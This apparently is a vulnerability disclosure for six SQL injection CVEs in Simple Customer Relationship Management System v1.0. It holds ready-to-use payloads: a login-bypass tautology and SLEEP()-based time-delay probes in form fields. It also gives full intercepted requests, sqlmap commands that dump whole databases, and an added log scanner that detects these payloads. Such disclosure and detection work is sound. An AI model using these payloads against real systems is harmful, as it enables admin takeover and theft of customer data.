# Simple Customer Relationship Management System v1.0 - SQL Injection Vulnerability
## Multiple SQL injection vulnerabilities found in Simple Customer Relationship Management System v1.0.
**Description:-**
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the username parameter under the Admin Panel.

**Steps to Reproduce:-**
> 1. Navigate to the Admin Panel by following the URL: http://localhost/php-scrm/admin/
> 2. Insert the payload given below in the username field and any random string (for example "test") in the password field, then click the "Login" button to take over the admin account.
> Payload: ' or 1 = 1 -- -

**Reference: CVE-2023-24364**

**Description:-**
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the description parameter under the Create Ticket function.

**Steps to Reproduce:-**
> 1. Register a user by navigating to the URL: http://localhost/php-scrm/registration.php
> 2. Log in as the registered user with valid credentials by following the URL: http://localhost/php-scrm/login.php
> 3. Navigate to the Create Ticket page by following the URL: http://localhost/php-scrm/create-ticket.php
> 4. Fill out the Create Ticket form, then intercept the request in Burp Suite.
> 5. Send the intercepted request to Burp Repeater.
> Payload: ' AND (SELECT 123456 FROM (SELECT(SLEEP(10)))xyz) AND 'abc'='abc
> 6. Insert the URL-encoded payload in the description parameter.
>
> subject=newticket&tasktype=Option+1&priority=important&description=newdescriptiontest'+AND+(SELECT+123456+FROM+(SELECT(SLEEP(10)))xyz)+AND+'abc'%3d'abc&send=Send
>
> 7. Click the "Send" button to send the request.
> 8. You will see that the response is delayed by 10 seconds, which shows the parameter is vulnerable to SQL injection.
> 9. Dump data using sqlmap.
> 10. Copy the Burp-intercepted request into a file named crm-create-ticket-request.txt
> 11. Dump the databases with sqlmap:
> `python sqlmap.py -r crm-create-ticket-request.txt -p description -dbs --batch`
> 12. Dump all data with sqlmap:
> `python sqlmap.py -r crm-create-ticket-request.txt -p description --dump-all --batch`

**Reference: CVE-2023-24652**

**Description:-**
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the oldpass parameter under the Change Password function.

**Steps to Reproduce:-**
> 1. Register a user by navigating to the URL: http://localhost/php-scrm/registration.php
> 2. Log in as the registered user with valid credentials by following the URL: http://localhost/php-scrm/login.php
> 3. Navigate to the Change Password page by following the URL: http://localhost/php-scrm/change-password.php
> 4. Fill out the Change Password form: put a random string such as "test123" in the "Current Password" field and random content such as "123456" in the "New Password" and "Confirm Password" fields, then intercept the request in Burp Suite.
> 5. Send the intercepted request to Burp Repeater.
> 6. Insert the payload given below in the oldpass parameter, then click the "Send" button to send the request.
> Payload: oldpass=test123'+AND+(SELECT+123+FROM+(SELECT(SLEEP(10)))abc)+AND'&newpass=123456&confirmpassword=123456&change=change
> 7. You will see that the response is delayed by 10 seconds, which shows the parameter is vulnerable to SQL injection.
> 8. Dump data using sqlmap.
> 9. Copy the Burp-intercepted request into a file named crm-request.txt
>
> POST /php-scrm/change-password.php HTTP/1.1
> Host: localhost
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 65
> Origin: http://localhost
> Connection: close
> Referer: http://localhost/php-scrm/change-password.php
> Cookie: PHPSESSID=65c7e25jf215pltjkg8gr5kli9
> Upgrade-Insecure-Requests: 1
> Sec-Fetch-Dest: document
> Sec-Fetch-Mode: navigate
> Sec-Fetch-Site: same-origin
> Sec-Fetch-User: ?1
>
> oldpass=test123&newpass=123456&confirmpassword=123456&change=Change
>
> 10. Dump the databases with sqlmap:
> `python sqlmap.py -r crm-request.txt -p oldpass -dbs --batch`
> 11. Dump all data with sqlmap:
> `python sqlmap.py -r crm-request.txt -p oldpass --dump-all --batch`

**Reference: CVE-2023-24653**

**Description:-**
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the name parameter under the Request a Quote function.

**Steps to Reproduce:-**
> 1. Register a user by navigating to the URL: http://localhost/php-scrm/registration.php
> 2. Log in as the registered user with valid credentials by following the URL: http://localhost/php-scrm/login.php
> 3. Navigate to the Request a Quote page by following the URL: http://localhost/php-scrm/get-quote.php
> 4. Fill out the Quote Request form, then intercept the request in Burp Suite.
> 5. Send the intercepted request to Burp Repeater.
> Payload: ' AND (SELECT 123456 FROM (SELECT(SLEEP(5)))xyz) AND 'abc'='abc
> 6. Insert the payload in the name parameter.
>
> Content-Disposition: form-data; name="name"
>
> test1' AND (SELECT 123456 FROM (SELECT(SLEEP(10)))xyz) AND 'abc'='abc
>
> 7. Click the "Send" button to send the request.
> 8. You will see that the response is delayed by 10 seconds, which shows the parameter is vulnerable to SQL injection.
> 9. Dump data using sqlmap.
> 10. Copy the Burp-intercepted request into a file named crm-quote-request.txt
> 11. Dump the databases with sqlmap:
> `python sqlmap.py -r crm-quote-request.txt -p name -dbs --batch`
> 12. Dump all data with sqlmap:
> `python sqlmap.py -r crm-quote-request.txt -p name --dump-all --batch`

**Reference: CVE-2023-24654**

**Description:-**
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the name parameter under the Profile Update function.

**Steps to Reproduce:-**
> 1. Register a user by navigating to the URL: http://localhost/php-scrm/registration.php
> 2. Log in as the registered user with valid credentials by following the URL: http://localhost/php-scrm/login.php
> 3. Navigate to the Profile Update page by following the URL: http://localhost/php-scrm/profile.php
> 4. Fill out your profile form, then intercept the request in Burp Suite.
> 5. Send the intercepted request to Burp Repeater.
> Payload: ' AND (SELECT 123 FROM (SELECT(SLEEP(10)))abc)-- abc
> 6. Insert the payload in the name parameter.
>
> Content-Disposition: form-data; name="name"
>
> user1' AND (SELECT 123 FROM (SELECT(SLEEP(10)))abc)-- abc
>
> 7. Click the "Send" button to send the request.
> 8. You will see that the response is delayed by 10 seconds, which shows the parameter is vulnerable to SQL injection.
> 9. Dump data using sqlmap.
> 10. Copy the Burp-intercepted request into a file named crm-profile-request.txt
> 11. Dump the databases with sqlmap:
> `python sqlmap.py -r crm-profile-request.txt -p name -dbs --batch`
> 12. Dump all data with sqlmap:
> `python sqlmap.py -r crm-profile-request.txt -p name --dump-all --batch`

**Reference: CVE-2023-24655**

**Description:-**
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the subject parameter under the Create Ticket function.

**Steps to Reproduce:-**
> 1. Register a user by navigating to the URL: http://localhost/php-scrm/registration.php
> 2. Log in as the registered user with valid credentials by following the URL: http://localhost/php-scrm/login.php
> 3. Navigate to the Create Ticket page by following the URL: http://localhost/php-scrm/create-ticket.php
> 4. Fill out the Create Ticket form, then intercept the request in Burp Suite.
> 5. Send the intercepted request to Burp Repeater.
> Payload: ' AND (SELECT 123456 FROM (SELECT(SLEEP(10)))xyz) AND 'abc'='abc
> 6. Insert the URL-encoded payload in the subject parameter.
>
> subject=newticket'+AND+(SELECT+123456+FROM+(SELECT(SLEEP(10)))xyz)+AND+'abc'%3d'abc&tasktype=Option+1&priority=important&description=newdescriptiontest&send=Send
>
> 7. Click the "Send" button to send the request.
> 8. You will see that the response is delayed by 10 seconds, which shows the parameter is vulnerable to SQL injection.
> 9. Dump data using sqlmap.
> 10. Copy the Burp-intercepted request into a file named crm-create-ticket-request.txt
> 11. Dump the databases with sqlmap:
> `python sqlmap.py -r crm-create-ticket-request.txt -p subject -dbs --batch`
> 12. Dump all data with sqlmap:
> `python sqlmap.py -r crm-create-ticket-request.txt -p subject --dump-all --batch`

**Reference: CVE-2023-24656**
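All six findings above use the same two request shapes: a login tautology and a MySQL `SLEEP()` time-delay probe in a form field. The scanner below is an added example (not code from this gist or from the php-scrm project) that URL-decodes POST form bodies from a request log and flags fields matching either shape, so a defender can spot these probes in server logs; the log line format, the admin POST path and all sample lines are constructed assumptions.

```python
import re
from typing import List, Tuple
from urllib.parse import parse_qsl

# (signature name, regex applied to the URL-decoded parameter value)
SIGNATURES = [
    # the admin-login payload:  ' or 1 = 1 -- -
    ("tautology", re.compile(r"'\s*or\s+\d+\s*=\s*\d+", re.IGNORECASE)),
    # the ticket/profile/quote/password payloads built on SELECT(SLEEP(10))
    ("time-delay", re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.IGNORECASE)),
]

# Constructed log lines: "<timestamp> <method> <path> <raw form body>".
SAMPLE_LOG = [
    # admin login with the tautology payload (POST path is assumed)
    "2023-01-20T10:15:31Z POST /php-scrm/admin/ username=%27+or+1+%3D+1+--+-&password=test",
    # body from the advisory's Create Ticket (description) finding
    "2023-01-20T10:16:02Z POST /php-scrm/create-ticket.php subject=newticket&tasktype=Option+1&priority=important&description=newdescriptiontest'+AND+(SELECT+123456+FROM+(SELECT(SLEEP(10)))xyz)+AND+'abc'%3d'abc&send=Send",
    # body from the advisory's Change Password (oldpass) finding
    "2023-01-20T10:17:44Z POST /php-scrm/change-password.php oldpass=test123'+AND+(SELECT+123+FROM+(SELECT(SLEEP(10)))abc)+AND'&newpass=123456&confirmpassword=123456&change=change",
    # benign ticket that mentions sleeping and a double dash; must not fire
    "2023-01-20T10:18:10Z POST /php-scrm/create-ticket.php subject=Printer+offline&tasktype=Option+1&priority=low&description=Please+check+--+it+sleeps+sometimes&send=Send",
]


def scan_body(body: str) -> List[Tuple[str, str]]:
    """Return (parameter, signature) for every field whose decoded value matches."""
    hits = []
    # parse_qsl undoes percent-encoding and '+' for spaces, so the
    # regexes see the same text the SQL engine would.
    for param, value in parse_qsl(body, keep_blank_values=True):
        for name, pattern in SIGNATURES:
            if pattern.search(value):
                hits.append((param, name))
    return hits


def scan_log(lines) -> List[Tuple[str, str, str]]:
    """Return (path, parameter, signature) for each flagged field in the log."""
    findings = []
    for line in lines:
        parts = line.split(" ", 3)
        if len(parts) < 4 or parts[1] != "POST":
            continue  # only form submissions carry the bodies we inspect
        _ts, _method, path, body = parts
        for param, sig in scan_body(body):
            findings.append((path, param, sig))
    return findings
```

Running `scan_log(SAMPLE_LOG)` flags the three injected requests by path and parameter and leaves the benign ticket alone; a real deployment would feed decoded bodies from the web server or WAF log instead of the constructed list.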